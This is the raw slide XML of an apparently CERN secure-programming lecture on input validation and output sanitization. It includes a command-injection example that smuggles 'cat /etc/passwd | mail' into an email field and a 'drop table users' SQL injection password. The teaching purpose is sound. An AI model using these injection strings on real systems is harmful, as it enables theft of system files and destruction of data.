\t])*(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t ])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*)(? :\.(?:(?:\r\n)?[ \t])*(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+| \Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*))*|(?: [^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\ ]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:\r\n)?[ \t])*)*\&lt;(?:(?:\r\n) ?[ \t])*(?:@(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\[" ()&lt;&gt;@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*)(?:\.(?:(?:\r\n) ?[ \t])*(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt; @,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*))*(?:,@(?:(?:\r\n)?[ \t])*(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@, ;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*)(?:\.(?:(?:\r\n)?[ \t] )*(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\ ".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*))*)*:(?:(?:\r\n)?[ \t])*)? (?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()&lt;&gt;@,;:\\". \[\]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:\r\n)?[ \t])*)(?:\.(?:(?: \r\n)?[ \t])*(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\[ "()&lt;&gt;@,;:\\".\[\]]))|"(?:[^\"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:\r\n)?[ \t]) *))*@(?:(?:\r\n)?[ \t])*(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t]) +|\Z|(?=[\["()&lt;&gt;@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*)(?:\ .(?:(?:\r\n)?[ \t])*(?:[^()&lt;&gt;@,;:\\".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z |(?=[\["()&lt;&gt;@,;:\\".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*))*\&gt;(?:( ?:\r\n)?[ \t])*))*)?;\s*)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>So </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>re-use existing code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>rather than reinvent the wheel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB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… your computer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>might </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>be at risk …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="153603" name="Picture 3" descr="C:\Sebastian\CERN\my presentations\future\755509753_3c2077aa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143000"/>
            <a:ext cx="6350000" cy="4762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number one: Input data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smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Don’t trust input data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> – input data is the single most common reason of security-related incidents</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>Nearly every active attack out there is the result of some kind of input from an attacker. Secure programming is about making sure that inputs </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>from bad people do not do bad things.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Buffer overflow, invalid or malicious input, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>code inside data…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z="1700" smtClean="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" i="1" smtClean="0"/>
              <a:t>Secure Programming Cookbook for C and C++ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" smtClean="0"/>
              <a:t>J. Viega, M. Messier</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" i="1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676275" y="3357563"/>
            <a:ext cx="8118475" cy="4841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5450" y="1147763"/>
            <a:ext cx="8570913" cy="324961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Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>your script sends e-mails with the following shell command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>confirmation.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> | mail $email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and someone provides the following e-mail address:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>me@fake.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> | mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>me@real.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0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517525" y="4941888"/>
            <a:ext cx="83629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200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>confirmation.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>| mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>me@fake.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p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200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>| mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>me@real.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0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203782" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3673475" y="3981450"/>
            <a:ext cx="441325" cy="692150"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 49019"/>
              <a:gd name="adj2" fmla="val 3920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 animBg="1"/>
      <p:bldP spid="203781" grpId="0"/>
      <p:bldP spid="20378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476250" y="5021263"/>
            <a:ext cx="5175250" cy="482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479425" y="3429000"/>
            <a:ext cx="3948113" cy="482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Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(SQL Injection): your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>webscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> authenticates users against a database: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sz="2300" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select count(*) from users where name = ’$name’ and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = ’$password’;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>but an attacker provides one of these passwords: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" dirty="0" smtClean="0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endParaRPr lang="en-US" sz="2300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dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select count(*) from users where name = ’$name’ and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" dirty="0" smtClean="0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r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2300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dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XXXXX’; drop table users; --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>select count(*) from users where name = ’$name’ and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XXXXX’; drop table users; --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’;</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2300" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Bent Arrow 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4572000" y="3501008"/>
            <a:ext cx="432048" cy="5760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ent Arrow 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5796136" y="5085184"/>
            <a:ext cx="432048" cy="5760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5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  <p:bldP spid="62467" grpId="0" animBg="1"/>
      <p:bldP spid="2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Input validation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/>
              <a:t>Input validation is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crucial</a:t>
            </a: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Consider all input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dangerous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>until proven valid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Default-deny </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>rule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allow only “good” characters and formulas and reject others </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(instead of looking for “bad” ones)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use regular expressions </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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Bounds checking, length checking (buffer overflow) etc.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Validation at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>different levels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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at input data entry point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right before taking security decisions based on that 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Validation and sanitization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0825" y="1125538"/>
          <a:ext cx="5041255" cy="518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5940425" y="2133600"/>
            <a:ext cx="2952750" cy="1008063"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -145061"/>
              <a:gd name="adj2" fmla="val 2951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Validate your input here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(check if it is correct)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5940425" y="4076700"/>
            <a:ext cx="2952750" cy="1008063"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -145061"/>
              <a:gd name="adj2" fmla="val 2951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Sanitize your output here (escape special characters etc.)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Sanitizing output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Escaping characters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>that may cause problems in external systems (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>filesystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, database, LDAP, Mail server, the Web, client browser etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="992188">
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="447675" algn="l"/>
                <a:tab pos="1160463" algn="l"/>
                <a:tab pos="2963863" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" b="1" dirty="0" smtClean="0"/>
              <a:t> 		to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\’ 	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(for any system where ’ ends a string)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3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992188">
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="447675" algn="l"/>
                <a:tab pos="1160463" algn="l"/>
                <a:tab pos="2963863" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" b="1" dirty="0" smtClean="0"/>
              <a:t> 	to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; 	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html parser)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400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Reuse existing functions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>E.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>in PHP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43000"/>
            <a:ext cx="8713788" cy="5143500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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Separate data from code: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</a:rPr>
              <a:t>Careful with shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" dirty="0" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>function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dirty="0" smtClean="0"/>
              <a:t>sample line from a Perl script: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>system(”rpm –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>qpi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $filename”);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what if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> contains illegal characters: | ; ` \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Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> also invokes the shell indirectly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>same for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> open(FILE, ”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –r $needle |”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>similar: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eval</a:t>
